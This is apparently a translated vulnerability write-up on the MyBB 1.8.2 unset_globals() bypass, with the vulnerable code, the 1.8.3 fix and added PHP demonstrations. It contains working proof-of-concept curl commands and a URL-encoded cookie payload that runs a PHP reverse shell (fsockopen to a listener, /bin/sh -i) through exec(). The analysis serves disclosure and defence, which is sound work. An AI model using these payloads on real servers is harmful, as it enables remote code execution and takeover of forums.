
MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution (Reverse Shell Explo.

Contents
1. Vulnerability description
2. Trigger conditions
3. Affected versions
4. Vulnerable code analysis
5. Mitigation
6. Attack and defense reflections

1. Vulnerability description

MyBB's unset_globals() function can be bypassed under special conditions, which makes remote code execution possible.

Relevant links:
https://cxsecurity.com/issue/wlb-2015120164
https://packetstormsecurity.com/files/134833/mybb-1.8.2-code-execution.html
https://www.exploit-db.com/exploits/35323/
2. Trigger conditions

0x1: PoC 1

// php.ini configuration
1. request_order = GP
2. register_globals = On
// remote code execution by just using curl on the command line (the cookie value must be quoted, otherwise the shell splits it at the semicolons)
3. curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://30.9.192.207/mybb_1802/

PHP automated verification script

0x2: PoC 2

// php.ini configuration
1. disable_functions = ini_get
2. register_globals = On
// url
3. index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1

No GLOBALS key is needed in this variant: with ini_get disabled, MyBB's guard if(@ini_get("register_globals") == 1) evaluates false (the suppressed call returns NULL), so the unset_globals() branch is never entered and the register_globals variables survive untouched, even when sent in the query string.

0x3: PoC 3

// php.ini configuration
1. request_order = GP
2. register_globals = On
// url
curl --cookie "GLOBALS=1; shutdown_queries[]=sql_inj" http://www.target/css.php
// also works with disable_functions = ini_get and register_globals = On:
css.php?shutdown_queries[]=sql_inj
3. Affected versions

MyBB 1.8, up to and including 1.8.2 (the fix shipped in 1.8.3, see section 5).

4. Vulnerable code analysis

\mybb_1802\inc\class_core.php

    ..
    // register_globals guard that precedes the excerpt quoted on the page (restored from the MyBB 1.8 source)
    if(@ini_get("register_globals") == 1)
    {
        $this->unset_globals($_POST);
        $this->unset_globals($_GET);
        $this->unset_globals($_FILES);
        $this->unset_globals($_COOKIE);
    }
    ..

    /**
     * Unsets globals from a specific array.
     *
     * @param array The array to unset from.
     */
    function unset_globals($array)
    {
        if(!is_array($array))
        {
            return;
        }

        foreach(array_keys($array) as $key)
        {
            unset($GLOBALS[$key]);
            unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
        }
    }

This logic looks correct, and it was written as a deliberate defensive measure, but certain PHP engine internals allow unset_globals() to be bypassed:

1. Normally every variable that arrives via GET, POST or COOKIE is removed again with unset($GLOBALS[$var]), even when register_globals is enabled. This is MyBB's own defense against older PHP installations that have register_globals = On enabled by mistake, and it prevents local variable overwriting.
2. There is, however, one special name: GLOBALS. The $GLOBALS superglobal is created and maintained by the PHP engine, $GLOBALS['key'] can be read and written anywhere in a program, and the engine binds the $GLOBALS array to the global symbol table.
3. If an attacker sends foo.php?GLOBALS=1, MyBB itself executes unset($GLOBALS['GLOBALS']), which severs the link between $GLOBALS and the global symbol table.
4. The direct consequence is that every later unset($GLOBALS[$key]) for the remaining keys of $_GET, $_POST, $_COOKIE, ... operates on a detached array and no longer removes anything from the real global scope. The variables that register_globals created survive, and the unset loop is effectively neutralised (the GLOBALS key must therefore come first in the request; keys unset before it are still removed).
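An added example, not MyBB's code and not part of the original post: a stand-alone PHP script that emulates the sequence above so the ordering dependency is visible. Because register_globals no longer exists in PHP >= 5.4, the script copies request keys into the global scope itself (mirroring PHP's refusal to register a variable named GLOBALS), then runs the same double-unset loop as MyBB's unset_globals() and finally the same dispatch as run_shutdown(). The cookie array, the harmless strtoupper callback and the function names emulate_register_globals, mybb_unset_globals and emulate_run_shutdown are constructed for the example. It assumes PHP 5.3 $GLOBALS semantics; on PHP 8.1 and later $GLOBALS is compiled specially and no longer carries a GLOBALS key, so the detachment does not reproduce there.

```php
<?php
// Added example, not MyBB code. Assumes PHP 5.3 $GLOBALS semantics (see lead-in).

// Emulation of register_globals = On (removed in PHP 5.4): copy each request key
// into the global symbol table. Real PHP skipped the name GLOBALS here, so the
// attacker cannot overwrite $GLOBALS directly; the key still sits in $_COOKIE.
function emulate_register_globals(array $input)
{
    foreach ($input as $name => $value) {
        if ($name === 'GLOBALS') {
            continue;
        }
        $GLOBALS[$name] = $value;
    }
}

// The loop from MyBB 1.8.2's unset_globals(), unchanged in substance.
// With 'GLOBALS' as the first key, the first iteration detaches $GLOBALS from
// the symbol table and every later unset() here touches only the detached copy.
function mybb_unset_globals(array $array)
{
    foreach (array_keys($array) as $key) {
        unset($GLOBALS[$key]);
        unset($GLOBALS[$key]);
    }
}

// Dispatch as in run_shutdown(): returns what the callbacks returned, or null
// when no $shutdown_functions survived the unset loop.
function emulate_run_shutdown()
{
    global $shutdown_functions;
    if (!isset($shutdown_functions) || !is_array($shutdown_functions)) {
        return null;
    }
    $results = array();
    foreach ($shutdown_functions as $function) {
        // call_user_func_array() with an attacker-chosen callable: the real
        // payload names exec; here the callable is a harmless strtoupper.
        $results[] = call_user_func_array($function['function'], $function['arguments']);
    }
    return $results;
}

// Constructed cookie jar, in the order the attacker sends it: GLOBALS first.
$cookie = array(
    'GLOBALS'            => '1',
    'shutdown_functions' => array(
        array('function' => 'strtoupper', 'arguments' => array('payload survived')),
    ),
);

emulate_register_globals($cookie);
mybb_unset_globals($cookie);
var_dump(emulate_run_shutdown());
```

On an affected PHP 5.3 build the dispatch runs strtoupper on the constructed argument, which is the same path the reverse-shell cookie takes with exec. Reverse the two cookie keys (payload first, GLOBALS second) and the payload is unset while $GLOBALS is still attached, so emulate_run_shutdown() finds nothing: the attack depends on the key order as well as on register_globals.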
Note that MyBB's own hardening did anticipate this problem, in \mybb_1802\inc\class_core.php:

    ..
    function __construct()
    {
        // Set up MyBB
        $protected = array('_GET', '_POST', '_SERVER', '_COOKIE', '_FILES', '_ENV', 'GLOBALS');
        foreach($protected as $var)
        {
            if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
            {
                die("Hacking attempt");
            }
        }
    ..

MyBB's intent is to reject any request whose parameters carry names such as _GET, _POST or GLOBALS that could tamper with global variables. The problem is that $_REQUEST is itself a superglobal whose contents depend on php.ini: the php.ini shipped with PHP 5.3 and later sets request_order = "GP", so $_REQUEST holds only GET and POST parameters. The filter therefore never sees cookie parameters, and the attacker can place the variable-overwrite payload in a cookie:

GLOBALS=1; shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2dr%20%27%24sock%3dfsockopen%28%22$yourip%22%2c%204444%29%3bexec%28%22%2fbin%2fsh%20%2di%20%3c%263%20%3e%263%202%3e%263%22%29%3b%27;

The argument URL-decodes to php -r '$sock=fsockopen("$yourip", 4444);exec("/bin/sh -i <&3 >&3 2>&3");' (with $yourip replaced by the listener address), i.e. a PHP reverse shell started by exec() inside the web server process.

To summarize, exploitation needs one of two scenarios. Both require register_globals = On, a directive PHP 5.4 removed, so only PHP <= 5.3 installations are exposed:

1. request_order = GP (the php.ini shipped with PHP 5.3 and later) together with register_globals = On: cookies are left out of $_REQUEST, so the protected-name check never sees the GLOBALS key and unset_globals() is neutralised as described above (PoC 1 and the cookie form of PoC 3).
2. disable_functions = ini_get together with register_globals = On: MyBB's if(@ini_get("register_globals") == 1) guard evaluates false and unset_globals() is never called at all, so no GLOBALS key is required (PoC 2 and the URL form of PoC 3).

In either case the attacker-controlled $shutdown_functions array reaches run_shutdown() in inc/functions.php, which hands it straight to call_user_func_array():

    function run_shutdown()
    {
        ..
        if(.. $error_handler->has_errors))
        {
            return;
        }
        ..
        // Run any shutdown functions if we have them
        if(is_array($shutdown_functions))
        {
            foreach($shutdown_functions as $function)
            {
                call_user_func_array($function['function'], $function['arguments']);
            }
        }
        ..

PoC 3 targets the sibling $shutdown_queries array, whose entries the same function runs as database queries, hence the SQL injection variant.

Relevant link: http://0day.today/exploit/22913
5. Mitigation

\inc\class_core.php (the corrected check: inspect each input array directly instead of trusting $_REQUEST; compare the 1.8.3 security release linked below)

    class MyBB
    {
        ..
        function __construct()
        {
            // Set up MyBB
            $protected = array('_GET', '_POST', '_SERVER', '_COOKIE', '_FILES', '_ENV', 'GLOBALS');
            foreach($protected as $var)
            {
                /*if(isset($_REQUEST[$var]) || isset($_FILES[$var]))*/
                if(isset($_GET[$var]) || isset($_POST[$var]) || isset($_COOKIE[$var]) || isset($_FILES[$var]))
                {
                    die("Hacking attempt");
                }
            }
        ..

Note what this check does and does not cover. It stops a GLOBALS key arriving through any of the three input arrays regardless of request_order, which defeats PoC 1 and the cookie form of PoC 3. PoC 2 sends no GLOBALS key at all and relies on disable_functions = ini_get so that unset_globals() is never reached, and this check does not stop it. The durable server-side fix is therefore register_globals = Off (or PHP >= 5.4, where the directive no longer exists), with the application-level check as defense in depth.

Relevant links:
http://blog.mybb.com/2014/11/20/mybb-1-8-3-1-6-16-released-security-releases/
http://cn.313.ninja/exploit/22913
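An added example, not MyBB's code and not part of the original post, covering both the $_REQUEST discussion in section 4 and the corrected check in this section: the two versions of the protected-name check rewritten as functions that return true when the request is allowed through, run against constructed $_GET, $_POST and $_COOKIE arrays, with $_REQUEST assembled the way PHP's request_order directive assembles it (a later letter overrides an earlier one; when request_order is empty PHP falls back to variables_order, which this helper does not model). The function names build_request, vulnerable_check and fixed_check and the cookie contents are assumptions of the example.

```php
<?php
// Added example, not MyBB code: protected-name check before and after the fix,
// against constructed input. Function names and inputs are assumptions.

$protected = array('_GET', '_POST', '_SERVER', '_COOKIE', '_FILES', '_ENV', 'GLOBALS');

// Assemble $_REQUEST the way request_order does: walk the letters G, P, C in the
// configured order, a later source overriding keys from an earlier one. Keys are
// preserved (array union), so numeric parameter names are not renumbered.
function build_request($order, array $get, array $post, array $cookie)
{
    $sources = array('G' => $get, 'P' => $post, 'C' => $cookie);
    $request = array();
    foreach (str_split(strtoupper($order)) as $letter) {
        if (isset($sources[$letter])) {
            $request = $sources[$letter] + $request;
        }
    }
    return $request;
}

// MyBB <= 1.8.2: trusts $_REQUEST, whose contents depend on php.ini.
function vulnerable_check(array $protected, array $request, array $files)
{
    foreach ($protected as $var) {
        if (isset($request[$var]) || isset($files[$var])) {
            return false; // the real code calls die("Hacking attempt") here
        }
    }
    return true;
}

// Corrected form: inspect every input array itself, so request_order is irrelevant.
function fixed_check(array $protected, array $get, array $post, array $cookie, array $files)
{
    foreach ($protected as $var) {
        if (isset($get[$var]) || isset($post[$var]) || isset($cookie[$var]) || isset($files[$var])) {
            return false;
        }
    }
    return true;
}

// Constructed request: empty query string and body, the payload in the cookie.
$get    = array();
$post   = array();
$files  = array();
$cookie = array(
    'GLOBALS'            => '1',
    'shutdown_functions' => array(array('function' => 'phpinfo', 'arguments' => array(-1))),
);

// request_order = "GP" (php.ini since 5.3) leaves the cookie out of $_REQUEST,
// so the old check has nothing to match; with "GPC" the same check sees the key.
$allowed_under_gp  = vulnerable_check($protected, build_request('GP',  $get, $post, $cookie), $files);
$allowed_under_gpc = vulnerable_check($protected, build_request('GPC', $get, $post, $cookie), $files);
$allowed_fixed     = fixed_check($protected, $get, $post, $cookie, $files);

var_dump($allowed_under_gp, $allowed_under_gpc, $allowed_fixed);
```

The three results make the dependency explicit: the original check's verdict changes with a php.ini setting the application does not control, while fixed_check() rejects the cookie on its own. It still only blocks the protected names; a payload that needs no GLOBALS key (PoC 2) has to be stopped by turning register_globals off.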
6. Attack and defense reflections

Copyright (c) 2016 little5ann All rights reserved